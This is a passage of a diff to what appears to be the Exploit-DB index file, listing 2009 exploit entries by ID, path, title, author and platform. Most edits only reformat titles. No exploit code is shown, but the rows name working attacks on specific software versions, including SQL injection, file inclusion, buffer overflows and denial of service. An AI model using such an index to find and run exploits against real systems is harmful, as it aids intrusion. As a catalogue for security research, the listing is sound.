Exploit",2009-05-29,snakespc,windows,remote,0 +8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Auth Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0 8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat <= 9.1.1 - Stack Overflow Crash PoC (osx/win)",2009-05-29,"Saint Patrick",multiple,dos,0 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0 -8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 (Auth Bypass) Remote SQL Injection",2009-05-29,"sniper code",php,webapps,0 -8829,platforms/php/webapps/8829.txt,"ZeusCart <= 2.3 (maincatid) SQL Injection",2009-05-29,Br0ly,php,webapps,0 -8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links <= 1.0 (id) SQL Injection",2009-05-29,Qabandi,php,webapps,0 -8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 (Auth Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0 +8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Auth Bypass) Remote SQL Injection",2009-05-29,"sniper code",php,webapps,0 +8829,platforms/php/webapps/8829.txt,"ZeusCart <= 2.3 - (maincatid) SQL Injection",2009-05-29,Br0ly,php,webapps,0 +8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links <= 1.0 - (id) SQL Injection",2009-05-29,Qabandi,php,webapps,0 +8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Auth Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0 8832,platforms/windows/dos/8832.php,"ICQ 6.5 URL Search Hook (Windows Explorer) Remote BoF PoC",2009-06-01,Nine:Situations:Group,windows,dos,0 8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 Web Management Console Arbitrary Command Exec",2009-06-01,Securitum,hardware,local,0 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) Remote SQL Injection Exploit",2009-06-01,Br0ly,php,webapps,0 -8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 (IAManager.dll) Remote BoF Exploit (heap spray)",2009-06-01,His0k4,windows,remote,0 +8835,platforms/windows/remote/8835.html,"Roxio CinePlayer 3.2 - (IAManager.dll) Remote BoF Exploit (heap spray)",2009-06-01,His0k4,windows,remote,0 8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 - Multiple SQL Injection Vulnerabilities",2009-06-01,"Nico Leidecker",php,webapps,0 8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - (ID3v1/ID3v2 Tag) Remote Stack BoF PoC (SEH)",2009-06-01,LiquidWorm,windows,dos,0 8838,platforms/php/webapps/8838.txt,"elitecms 1.01 - (SQL/XSS) Multiple Vulnerabilities",2009-06-01,xeno_hive,php,webapps,0 -8839,platforms/php/webapps/8839.txt,"Open-school 1.0 (id) Remote SQL Injection",2009-06-01,OzX,php,webapps,0 -8840,platforms/php/webapps/8840.txt,"Escon SupportPortal Pro 3.0 (tid) Blind SQL Injection",2009-06-01,OzX,php,webapps,0 +8839,platforms/php/webapps/8839.txt,"Open-school 1.0 - (id) Remote SQL Injection",2009-06-01,OzX,php,webapps,0 +8840,platforms/php/webapps/8840.txt,"Escon SupportPortal Pro 3.0 - (tid) Blind SQL Injection",2009-06-01,OzX,php,webapps,0 8841,platforms/php/webapps/8841.txt,"unclassified newsboard 1.6.4 - Multiple Vulnerabilities",2009-06-01,girex,php,webapps,0 8842,platforms/multiple/dos/8842.pl,"Apache mod_dav / svn Remote Denial of Service Exploit",2009-06-01,kingcope,multiple,dos,0 8843,platforms/php/webapps/8843.pl,"Online Grades & Attendance 3.2.6 Credentials Changer SQL Exploit",2009-06-01,YEnH4ckEr,php,webapps,0 8844,platforms/php/webapps/8844.txt,"Online Grades & Attendance 3.2.6 - Multiple SQL Injection Vulnerabilities",2009-06-01,YEnH4ckEr,php,webapps,0 8846,platforms/hardware/remote/8846.txt,"ASMAX AR 804 gu Web Management Console Arbitrary Command Exec",2009-06-01,Securitum,hardware,remote,0 -8847,platforms/php/webapps/8847.txt,"Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection",2009-06-01,"Chip d3 bi0s",php,webapps,0 -8848,platforms/php/webapps/8848.txt,"ecsportal rel 6.5 (article_view_photo.php id) SQL Injection",2009-06-01,taRentReXx,php,webapps,0 +8847,platforms/php/webapps/8847.txt,"Joomla Component Joomlaequipment 2.0.4 - (com_juser) SQL Injection",2009-06-01,"Chip d3 bi0s",php,webapps,0 +8848,platforms/php/webapps/8848.txt,"ecsportal rel 6.5 - (article_view_photo.php id) SQL Injection",2009-06-01,taRentReXx,php,webapps,0 8849,platforms/asp/webapps/8849.txt,"R2 Newsletter Lite/Pro/Stats - (admin.mdb) Database Disclosure",2009-06-01,TiGeR-Dz,asp,webapps,0 8850,platforms/php/webapps/8850.txt,"PAD Site Scripts 3.6 - Remote Arbitrary Database Backup",2009-06-01,TiGeR-Dz,php,webapps,0 -8851,platforms/php/webapps/8851.txt,"AdaptBB 1.0 (forumspath) Remote File Inclusion",2009-06-01,"Mehmet Ince",php,webapps,0 +8851,platforms/php/webapps/8851.txt,"AdaptBB 1.0 - (forumspath) Remote File Inclusion",2009-06-01,"Mehmet Ince",php,webapps,0 8852,platforms/php/webapps/8852.txt,"ASP Football Pool 2.3 - Remote Database Disclosure",2009-06-01,ByALBAYX,php,webapps,0 8853,platforms/php/webapps/8853.txt,"Online Grades & Attendance 3.2.6 - Multiple Local File Inclusion Vulnerabilities",2009-06-02,YEnH4ckEr,php,webapps,0 8854,platforms/php/webapps/8854.pl,"Online Grades & Attendance 3.2.6 - Blind SQL Injection Exploit",2009-06-02,YEnH4ckEr,php,webapps,0 @@ -8360,11 +8360,11 @@ id,file,description,date,author,platform,type,port 8862,platforms/windows/dos/8862.txt,"Apple QuickTime Image Description Atom Sign Extension PoC",2009-06-03,webDEViL,windows,dos,0 8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0 8864,platforms/php/webapps/8864.txt,"My Mini Bill (orderid) Remote SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 -8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml <= 1.0.1 (Auth Bypass) SQL Injection",2009-06-03,Qabandi,php,webapps,0 +8865,platforms/php/webapps/8865.txt,"EgyPlus 7ml <= 1.0.1 - (Auth Bypass) SQL Injection",2009-06-03,Qabandi,php,webapps,0 8866,platforms/php/webapps/8866.php,"Podcast Generator <= 1.2 unauthorized Re-Installation Remote Exploit",2009-06-03,StAkeR,php,webapps,0 -8867,platforms/php/webapps/8867.pl,"Joomla Component Seminar 1.28 (id) Blind SQL Injection Exploit",2009-06-03,"ThE g0bL!N",php,webapps,0 +8867,platforms/php/webapps/8867.pl,"Joomla Component Seminar 1.28 - (id) Blind SQL Injection Exploit",2009-06-03,"ThE g0bL!N",php,webapps,0 8868,platforms/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure",2009-06-03,"Nico Leidecker",php,webapps,0 -8869,platforms/php/webapps/8869.txt,"Supernews 2.6 (index.php noticia) Remote SQL Injection",2009-06-03,DD3str0y3r,php,webapps,0 +8869,platforms/php/webapps/8869.txt,"Supernews 2.6 - (index.php noticia) Remote SQL Injection",2009-06-03,DD3str0y3r,php,webapps,0 8870,platforms/php/webapps/8870.txt,"Joomla Omilen Photo Gallery 0.5b - Local File Inclusion",2009-06-03,ByALBAYX,php,webapps,0 8871,platforms/php/webapps/8871.txt,"Movie PHP Script 2.0 - (init.php anticode) Code Execution",2009-06-03,SirGod,php,webapps,0 8872,platforms/php/webapps/8872.txt,"Joomla Component com_mosres Multiple SQL Injection Vulnerabilities",2009-06-03,"Chip d3 bi0s",php,webapps,0 @@ -8377,14 +8377,14 @@ id,file,description,date,author,platform,type,port 8879,platforms/php/webapps/8879.htm,"Host Directory PRO 2.1.0 - Remote Change Admin Password Exploit",2009-06-04,TiGeR-Dz,php,webapps,0 8880,platforms/linux/remote/8880.txt,"kloxo 5.75 - Multiple Vulnerabilities",2009-06-04,anonymous,linux,remote,0 8881,platforms/windows/local/8881.php,"PeaZIP <= 2.6.1 Compressed Filename Command Injection Exploit",2009-06-05,Nine:Situations:Group,windows,local,0 -8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 (idx) Remote SQL Injection",2009-06-05,snakespc,php,webapps,0 -8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 (Auth Bypass) Remote SQL Injection",2009-06-05,"ThE g0bL!N",php,webapps,0 +8882,platforms/php/webapps/8882.txt,"Pixelactivo 3.0 - (idx) Remote SQL Injection",2009-06-05,snakespc,php,webapps,0 +8883,platforms/php/webapps/8883.txt,"Pixelactivo 3.0 - (Auth Bypass) Remote SQL Injection",2009-06-05,"ThE g0bL!N",php,webapps,0 8884,platforms/php/webapps/8884.txt,"Kjtechforce mailman b1 - (code) SQL Injection Delete Row",2009-06-05,YEnH4ckEr,php,webapps,0 -8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 (dest) Remote Blind SQL Injection Exploit",2009-06-05,YEnH4ckEr,php,webapps,0 +8885,platforms/php/webapps/8885.pl,"Kjtechforce mailman b1 - (dest) Remote Blind SQL Injection Exploit",2009-06-05,YEnH4ckEr,php,webapps,0 8886,platforms/php/webapps/8886.txt,"MyCars Automotive (Auth Bypass) SQL Injection",2009-06-08,snakespc,php,webapps,0 8889,platforms/asp/webapps/8889.txt,"VT-Auth 1.0 - (zHk8dEes3.txt) File Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 -8890,platforms/asp/webapps/8890.txt,"fipsCMS Light 2.1 (db.mdb) Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 -8891,platforms/php/webapps/8891.txt,"Joomla Component com_school 1.4 (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 +8890,platforms/asp/webapps/8890.txt,"fipsCMS Light 2.1 - (db.mdb) Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps,0 +8891,platforms/php/webapps/8891.txt,"Joomla Component com_school 1.4 - (classid) SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps,0 8892,platforms/php/webapps/8892.txt,"Virtue Classifieds (category) SQL Injection",2009-06-08,OzX,php,webapps,0 8893,platforms/php/webapps/8893.txt,"Virtue Book Store (cid) Remote SQL Injection",2009-06-08,OzX,php,webapps,0 8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall (cid) Remote SQL Injection",2009-06-08,OzX,php,webapps,0 @@ -8393,7 +8393,7 @@ id,file,description,date,author,platform,type,port 8897,platforms/windows/remote/8897.c,"httpdx <= 0.8 FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 8898,platforms/php/webapps/8898.txt,"Joomla Component MooFAQ (com_moofaq) LFI",2009-06-08,"Chip d3 bi0s",php,webapps,0 8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow PoC",2009-06-08,DSecRG,windows,dos,0 -8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 (source_class) Remote SQL Injection",2009-06-08,snakespc,php,webapps,0 +8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - (source_class) Remote SQL Injection",2009-06-08,snakespc,php,webapps,0 8901,platforms/php/webapps/8901.txt,"virtue news - (SQL/XSS) Multiple Vulnerabilities",2009-06-08,snakespc,php,webapps,0 8902,platforms/php/webapps/8902.htm,"Grestul 1.2 - Remote Add Administrator Account Exploit",2009-06-08,"ThE g0bL!N",php,webapps,0 8903,platforms/php/webapps/8903.txt,"DM FileManager 3.9.2 Insecure Cookie Handling",2009-06-08,"ThE g0bL!N",php,webapps,0 @@ -8402,12 +8402,12 @@ id,file,description,date,author,platform,type,port 8906,platforms/php/webapps/8906.pl,"Shop Script Pro 2.12 - Remote SQL Injection Exploit",2009-06-08,Ams,php,webapps,0 8907,platforms/multiple/remote/8907.txt,"Apple Safari <= 3.2.x - (XXE attack) Local File Theft",2009-06-09,"Chris Evans",multiple,remote,0 8908,platforms/php/webapps/8908.txt,"Joomla Component BookLibrary 1.5.2.4 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 -8911,platforms/php/webapps/8911.txt,"Joomla Component Akobook 2.3 (gbid) SQL Injection",2009-06-09,Ab1i,php,webapps,0 +8911,platforms/php/webapps/8911.txt,"Joomla Component Akobook 2.3 - (gbid) SQL Injection",2009-06-09,Ab1i,php,webapps,0 8912,platforms/php/webapps/8912.txt,"Joomla Component com_media_library 1.5.3 - RFI",2009-06-09,"Mehmet Ince",php,webapps,0 8913,platforms/php/webapps/8913.txt,"S-CMS <= 2.0b3 - Multiple Local File Inclusion Vulnerabilities",2009-06-09,YEnH4ckEr,php,webapps,0 8914,platforms/php/webapps/8914.txt,"S-CMS <= 2.0b3 - Multiple SQL Injection Vulnerabilities",2009-06-09,YEnH4ckEr,php,webapps,0 -8915,platforms/php/webapps/8915.pl,"S-CMS <= 2.0b3 (username) Blind SQL Injection Exploit",2009-06-09,YEnH4ckEr,php,webapps,0 -8916,platforms/windows/remote/8916.py,"Free Download Manager 2.5/3.0 (Control Server) Remote BoF Exploit",2009-06-09,His0k4,windows,remote,80 +8915,platforms/php/webapps/8915.pl,"S-CMS <= 2.0b3 - (username) Blind SQL Injection Exploit",2009-06-09,YEnH4ckEr,php,webapps,0 +8916,platforms/windows/remote/8916.py,"Free Download Manager 2.5/3.0 - (Control Server) Remote BoF Exploit",2009-06-09,His0k4,windows,remote,80 8917,platforms/php/webapps/8917.txt,"mrcgiguy the ticket system 2.0 php - Multiple Vulnerabilities",2009-06-09,"ThE g0bL!N",php,webapps,0 8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links (report.php id) Remote SQL Injection",2009-06-09,"ThE g0bL!N",php,webapps,0 8919,platforms/php/webapps/8919.txt,"Joomla Component com_realestatemanager 1.0 - RFI",2009-06-09,"Mehmet Ince",php,webapps,0 @@ -8418,18 +8418,18 @@ id,file,description,date,author,platform,type,port 8924,platforms/php/webapps/8924.txt,"School Data Navigator (page) Local/Remote File Inclusion",2009-06-10,Br0ly,php,webapps,0 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script - (Auth Bypass) Insecure Cookie Handling",2009-06-10,N@bilX,php,webapps,0 8926,platforms/php/webapps/8926.txt,"mrcgiguy freeticket - (ch/SQL) Multiple Vulnerabilities",2009-06-10,"ThE g0bL!N",php,webapps,0 -8927,platforms/php/webapps/8927.pl,"Open Biller 0.1 (username) Blind SQL Injection Exploit",2009-06-10,YEnH4ckEr,php,webapps,0 +8927,platforms/php/webapps/8927.pl,"Open Biller 0.1 - (username) Blind SQL Injection Exploit",2009-06-10,YEnH4ckEr,php,webapps,0 8928,platforms/php/webapps/8928.txt,"phpWebThings <= 1.5.2 - (help.php module) Local File Inclusion",2009-06-11,Br0ly,php,webapps,0 8929,platforms/php/webapps/8929.txt,"Splog <= 1.2 Beta - Multiple Remote SQL Injection Vulnerabilities",2009-06-11,YEnH4ckEr,php,webapps,0 8930,platforms/windows/remote/8930.txt,"ModSecurity <= 2.5.9 (Core Rules <= 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",windows,remote,0 -8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0 +8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 - (deleteTorrent) Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0 8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - (XSS/SQL Injection) Multiple Vulnerabilities",2009-06-11,Br0ly,php,webapps,0 8933,platforms/php/webapps/8933.php,"Sniggabo CMS (article.php id) Remote SQL Injection Exploit",2009-06-11,Lidloses_Auge,php,webapps,0 8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow Exploit (Windows)",2009-06-12,ryujin,windows,remote,0 -8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 (Auth Bypass) SQL Injection",2009-06-12,ByALBAYX,php,webapps,0 +8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - (Auth Bypass) SQL Injection",2009-06-12,ByALBAYX,php,webapps,0 8936,platforms/php/webapps/8936.txt,"4Images <= 1.7.7 - Filter Bypass HTML Injection/XSS",2009-06-12,Qabandi,php,webapps,0 8937,platforms/php/webapps/8937.txt,"campus virtual-lms - (XSS/SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0 -8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 (URL) Remote Buffer Overflow Exploit (xp/sp2)",2009-06-12,seer[N.N.U],windows,remote,0 +8938,platforms/windows/remote/8938.txt,"Green Dam 3.17 - (URL) Remote Buffer Overflow Exploit (xp/sp2)",2009-06-12,seer[N.N.U],windows,remote,0 8939,platforms/php/webapps/8939.pl,"phpWebThings <= 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit",2009-06-12,StAkeR,php,webapps,0 8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 Resource Exhaustion via Attacked IAX Fuzzer",2009-06-12,"Blake Cornell",multiple,dos,0 8941,platforms/php/webapps/8941.txt,"pivot 1.40.4-7 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 @@ -8438,14 +8438,14 @@ id,file,description,date,author,platform,type,port 8944,platforms/php/webapps/8944.txt,"Uebimiau Web-Mail <= 3.2.0-1.8 - Remote File / Overwrite Vulnerabilities",2009-06-12,GoLd_M,php,webapps,0 8946,platforms/php/webapps/8946.txt,"Joomla Component com_Projectfork 2.0.10 - Local File Inclusion",2009-06-15,ByALBAYX,php,webapps,0 8947,platforms/php/webapps/8947.txt,"impleo music collection 2.0 - (SQL/XSS) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 -8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 (top) Remote File Inclusion",2009-06-15,Br0ly,php,webapps,0 +8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 - (top) Remote File Inclusion",2009-06-15,Br0ly,php,webapps,0 8949,platforms/php/webapps/8949.txt,"SugarCRM 5.2.0e Remote Code Execution",2009-06-15,USH,php,webapps,0 8950,platforms/php/webapps/8950.txt,"formmail 1.92 - Multiple Vulnerabilities",2009-06-15,USH,php,webapps,0 8951,platforms/php/webapps/8951.php,"DB Top Sites 1.0 - Remote Command Execution Exploit",2009-06-15,SirGod,php,webapps,0 -8952,platforms/php/webapps/8952.txt,"DB Top Sites 1.0 (index.php u) Local File Inclusion",2009-06-15,SirGod,php,webapps,0 +8952,platforms/php/webapps/8952.txt,"DB Top Sites 1.0 - (index.php u) Local File Inclusion",2009-06-15,SirGod,php,webapps,0 8953,platforms/php/webapps/8953.txt,"elvin bts 1.2.0 - Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 - (LFI/SQL) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 -8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 (syslog) Denial of Service Exploit",2009-06-15,h00die,linux,dos,0 +8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - (syslog) Denial of Service Exploit",2009-06-15,h00die,linux,dos,0 8956,platforms/php/webapps/8956.htm,"Evernew Free Joke Script 1.2 - Remote Change Password Exploit",2009-06-15,Hakxer,php,webapps,0 8957,platforms/multiple/dos/8957.txt,"Apple Safari & Quicktime Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0 8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0 @@ -8463,18 +8463,18 @@ id,file,description,date,author,platform,type,port 8970,platforms/windows/remote/8970.txt,"McAfee 3.6.0.608 - naPolicyManager.dll ActiveX Arbitrary Data Write",2009-06-16,callAX,windows,remote,0 8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 Unicode Buffer Overrun/DoS",2009-06-16,LiquidWorm,windows,dos,0 8974,platforms/php/webapps/8974.txt,"XOOPS <= 2.3.3 - Remote File Disclosure (.htaccess)",2009-06-16,daath,php,webapps,0 -8975,platforms/php/webapps/8975.txt,"phpFK 7.03 (page_bottom.php) Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0 +8975,platforms/php/webapps/8975.txt,"phpFK 7.03 - (page_bottom.php) Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0 8976,platforms/multiple/dos/8976.pl,"Multiple HTTP Server - Low Bandwidth Denial of Service (slowloris.pl)",2009-06-17,RSnake,multiple,dos,0 8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injection Vulnerabilities",2009-06-17,n3wb0ss,php,webapps,0 8978,platforms/php/webapps/8978.txt,"fuzzylime CMS <= 3.03a - Local Inclusion / Arbitrary File Corruption PoC",2009-06-17,StAkeR,php,webapps,0 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion Vulnerabilities",2009-06-17,YEnH4ckEr,php,webapps,0 -8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit",2009-06-17,YEnH4ckEr,php,webapps,0 +8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Remote Blind SQL Injection Exploit",2009-06-17,YEnH4ckEr,php,webapps,0 8981,platforms/php/webapps/8981.txt,"phportal 1.0 Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 -8982,platforms/linux/dos/8982.txt,"compface <= 1.5.2 (XBM File) Local Buffer Overflow PoC",2009-06-17,metalhoney,linux,dos,0 +8982,platforms/linux/dos/8982.txt,"compface <= 1.5.2 - (XBM File) Local Buffer Overflow PoC",2009-06-17,metalhoney,linux,dos,0 8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 - dlpcrypt.sys Local Kernel ring0 Code Execution Exploit",2009-06-18,mu-b,windows,local,0 8984,platforms/php/webapps/8984.txt,"cms buzz - (XSS/pc/hi) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,windows,remote,0 -8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 (Auth Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps,0 +8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 - (Auth Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps,0 8988,platforms/php/webapps/8988.txt,"pc4 Uploader <= 10.0 - Remote File Disclosure",2009-06-22,Qabandi,php,webapps,0 8990,platforms/php/webapps/8990.txt,"phpDatingClub 3.7 - Remote SQL/XSS Injection Vulnerabilities",2009-06-22,"ThE g0bL!N",php,webapps,0 8991,platforms/multiple/dos/8991.php,"Multiple HTTP Server - Low Bandwidth Denial of Service (2)",2009-06-22,evilrabbi,multiple,dos,0 @@ -8486,7 +8486,7 @@ id,file,description,date,author,platform,type,port 8997,platforms/php/webapps/8997.txt,"kasseler CMS - (fd/XSS) Multiple Vulnerabilities",2009-06-22,S(r1pt,php,webapps,0 8998,platforms/php/webapps/8998.txt,"Sourcebans <= 1.4.2 - Arbitrary Change Admin Email",2009-06-22,"Mr. Anonymous",php,webapps,0 8999,platforms/php/webapps/8999.txt,"Joomla Component com_tickets <= 2.1 - (id) SQL Injection",2009-06-22,"Chip d3 bi0s",php,webapps,0 -9000,platforms/php/webapps/9000.txt,"RS-CMS 2.1 (key) Remote SQL Injection",2009-06-22,Mr.tro0oqy,php,webapps,0 +9000,platforms/php/webapps/9000.txt,"RS-CMS 2.1 - (key) Remote SQL Injection",2009-06-22,Mr.tro0oqy,php,webapps,0 9001,platforms/php/webapps/9001.php,"MyBB <= 1.4.6 - Remote Code Execution Exploit",2009-06-22,The:Paradox,php,webapps,0 9002,platforms/windows/remote/9002.c,"Bopup Communications Server 3.2.26.5460 - Remote SYSTEM Exploit",2009-06-22,mu-b,windows,remote,19810 9004,platforms/php/webapps/9004.txt,"Zen Cart 1.3.8 - Remote Code Execution Exploit",2009-06-23,BlackH,php,webapps,0 @@ -8494,24 +8494,24 @@ id,file,description,date,author,platform,type,port 9006,platforms/windows/dos/9006.py,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos Exploit",2009-06-23,Nibin,windows,dos,0 9007,platforms/windows/dos/9007.rb,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Dos (Metasploit)",2009-06-23,Nibin,windows,dos,0 9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c - (RFI/LFI/XSS) Multiple Vulnerabilities",2009-06-23,CraCkEr,php,webapps,0 -9009,platforms/php/webapps/9009.txt,"BASE <= 1.2.4 (Auth Bypass) Insecure Cookie Handling",2009-06-24,"Tim Medin",php,webapps,0 -9010,platforms/php/webapps/9010.txt,"Glossword <= 1.8.11 (index.php x) Local File Inclusion",2009-06-24,t0fx,php,webapps,0 +9009,platforms/php/webapps/9009.txt,"BASE <= 1.2.4 - (Auth Bypass) Insecure Cookie Handling",2009-06-24,"Tim Medin",php,webapps,0 +9010,platforms/php/webapps/9010.txt,"Glossword <= 1.8.11 - (index.php x) Local File Inclusion",2009-06-24,t0fx,php,webapps,0 9011,platforms/php/webapps/9011.txt,"Joomla Component com_pinboard Remote File Upload",2009-06-24,"ViRuSMaN ",php,webapps,0 9012,platforms/php/webapps/9012.txt,"tribiq CMS 5.0.12c - (XSS/LFI) Multiple Vulnerabilities",2009-06-24,CraCkEr,php,webapps,0 -9014,platforms/php/webapps/9014.txt,"PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind",2009-06-24,JosS,php,webapps,0 -9015,platforms/php/webapps/9015.txt,"LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion",2009-06-24,JosS,php,webapps,0 +9014,platforms/php/webapps/9014.txt,"PHPEcho CMS 2.0-rc3 - (forum) XSS Cookie Stealing / Blind",2009-06-24,JosS,php,webapps,0 +9015,platforms/php/webapps/9015.txt,"LightOpenCMS 0.1 - (smarty.php cwd) Local File Inclusion",2009-06-24,JosS,php,webapps,0 9016,platforms/php/webapps/9016.txt,"Joomla Component com_amocourse - (catid) SQL Injection",2009-06-24,"Chip d3 bi0s",php,webapps,0 9017,platforms/php/webapps/9017.txt,"Joomla Component com_pinboard (task) SQL Injection Exploit",2009-06-25,Stack,php,webapps,0 9018,platforms/php/webapps/9018.txt,"MyFusion 6b - settings[locale] Local File Inclusion",2009-06-25,CraCkEr,php,webapps,0 -9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 (Auth Bypass) SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0 -9020,platforms/php/webapps/9020.py,"AlumniServer 1.0.1 (resetpwemail) Blind SQL Injection Exploit",2009-06-25,YEnH4ckEr,php,webapps,0 +9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - (Auth Bypass) SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0 +9020,platforms/php/webapps/9020.py,"AlumniServer 1.0.1 - (resetpwemail) Blind SQL Injection Exploit",2009-06-25,YEnH4ckEr,php,webapps,0 9021,platforms/php/webapps/9021.txt,"MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection",2009-06-25,XaDoS,php,webapps,0 9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator - (AB/SQL/XSS) Multiple Vulnerabilities",2009-06-26,HxH,php,webapps,0 9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injection Vulnerabilities",2009-06-26,YEnH4ckEr,php,webapps,0 -9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 (Auth Bypass) Remote SQL Injection",2009-06-26,"ThE g0bL!N",php,webapps,0 -9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 (index.php page) LFI",2009-06-26,SirGod,php,webapps,0 +9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - (Auth Bypass) Remote SQL Injection",2009-06-26,"ThE g0bL!N",php,webapps,0 +9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 - (index.php page) LFI",2009-06-26,SirGod,php,webapps,0 9026,platforms/php/webapps/9026.txt,"WHOISCART (Auth Bypass) Information Disclosure",2009-06-29,SecurityRules,php,webapps,0 -9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 (cat.php CatID) SQL Injection",2009-06-29,SecurityRules,php,webapps,0 +9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - (cat.php CatID) SQL Injection",2009-06-29,SecurityRules,php,webapps,0 9028,platforms/php/webapps/9028.txt,"Joomla Component com_php (id) Blind SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 9029,platforms/windows/dos/9029.rb,"VideoLAN VLC Media Player 0.9.9 smb:// URI Stack BoF PoC",2009-06-29,Trancer,windows,dos,0 9030,platforms/php/webapps/9030.txt,"Joomla Component com_K2 -q 1.0.1b - (category) SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 @@ -8520,21 +8520,21 @@ id,file,description,date,author,platform,type,port 9033,platforms/windows/dos/9033.pl,"SCMPX 1.5.1 - (.m3u) Local Heap Overflow PoC",2009-06-29,hack4love,windows,dos,0 